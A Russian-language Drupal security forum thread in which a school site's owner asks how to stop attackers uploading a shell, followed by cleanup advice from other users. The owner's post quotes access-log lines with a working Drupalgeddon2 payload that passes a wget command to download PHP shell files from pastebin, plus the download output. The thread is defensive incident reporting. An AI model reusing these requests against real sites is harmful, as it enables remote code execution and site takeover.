1. Главная
  2. Форумы
  3. Техподдержка Drupal
  4. Безопасность

Заливают шелл на сайт

Главные вкладки

Аватар пользователя Radli Radli 21 апреля 2018 в 12:59

Ядро 7.51 было
(сейчас обновился до 7.58, поможет ли это обновление?)

"POST /?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23type%5D=markup&name%5B%23markup%5D=wget+-O+RxR__yuwshxvmkota.php+%27https%3A%2F%2Fpastebin.com%2Fraw%2FEU5eF9Lx%27

"POST /?q=file%2Fajax%2Fname%2F%23value%2Fform-MJJ_aI6H7wGkC3wIpZ56o1yRYdnVSGOhONMbUrRMQSQ

"POST /?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23type%5D=markup&name%5B%23markup%5D=wget+-O+RxR__dyejfxaonpbk.php+%27https%3A%2F%2Fpastebin.com%2Fraw%2FEU5eF9Lx%27

Результат:

--2018-04-21 05:56:31-- https://pastebin.com/raw/EU5eF9Lx
Resolving pastebin.com... 104.20.209.21, 104.20.208.21
Connecting to pastebin.com|104.20.209.21|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/plain]
Saving to: `RxR__yuwshxvmkota.php'

0K 51.3M=0s

2018-04-21 05:56:31 (51.3 MB/s) - `RxR__yuwshxvmkota.php' saved [751]

--2018-04-21 05:56:32-- https://pastebin.com/raw/3s8gLhBu
Resolving pastebin.com... 104.20.209.21, 104.20.208.21
Connecting to pastebin.com|104.20.209.21|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/plain]
Saving to: `yE.php'

0K ....... 37.4M=0s

2018-04-21 05:56:32 (37.4 MB/s) - `yE.php' saved [8000]

Как можно защититься от этого?
По тому что оставляют, это группа RxR с Йемен. (сайт школьный)

Вроде как уязвимость закрыта в 7.58
https://vulners.com/openvas/OPENVAS:1361412562310108438

Комментарии

Аватар пользователя Phantom63rus Phantom63rus 21 апреля 2018 в 13:38
1

Грохнуть все файлы. Залить чистые. Потом пройтись утилиткой ai-bolit.

Кроме того посмотреть пользователей и сбросить права. Посмотреть базу на предмет пхп-кода.

Аватар пользователя MKhabibullin MKhabibullin 21 апреля 2018 в 15:11

Один из вариантов очистки уже зараженного сайта такой:

  1. Снимаем бекап
  2. Подключаем сайт к сервису https://virusdie.ru(инструкция есть на сайте - там все просто)
  3. Запускаем сканирование и получаем список модифицированных файлов с "закладками"
  4. Вычищаем закладки и удаляем "левые" файлы и созданные каталоги(при их наличии) - их легко увидеть в отчете о сканировании
  5. Пробуем запустить drush up drupal
  6. Если drush up не срабатывает - заливаем вручную новое ядро на хостинг и запускаем update.php
  7. Закачиваем в корень сайта robots.txt и .htaccess из бекапа и на всякий случай проверяем их содержимое
  8. Повторно прогоняем сканирование дабы убедиться что опасность миновала
  9. Удаляем с хостинга файлы от virusdie
  10. Готово
Аватар пользователя Phantom63rus Phantom63rus 21 апреля 2018 в 16:52

Плохой вариант. Потому что:
- бывают ложноположительные срабатывания
- бывает что несрабатывает

Любые антивирусные утилиты это лишь ДОПОЛНИТЕЛЬНОЕ средство.

Аватар пользователя MKhabibullin MKhabibullin 21 апреля 2018 в 17:47

Ну это само собой, не панацея - после заливки шелла в принципе гарантировать ничего нельзя, надо очень внимательно все проверять. В идеале, конечно, восстановиться из бекапа, снятого до инцидента или откатиться через git, если есть возможность и обновить ядро. Описаный выше вариант скорее для случаев когда надо оперативно сайт вернуть в рабочее состояние.

Аватар пользователя Radli Radli 21 апреля 2018 в 18:02

Сайт чистый
Особо ничего сделать не могли,
- заливали свои пару пхп скриптов только
- ломали index.php (пытались внедрить свои код)
при обновлении до 7.58 заменяется все файла кроме папки sites (где в папке загрузки не было обнаружено посторонних файлов и на всякий случай восстановлен с бэкапа)
БД не затронута, таблице с кэшами почищены.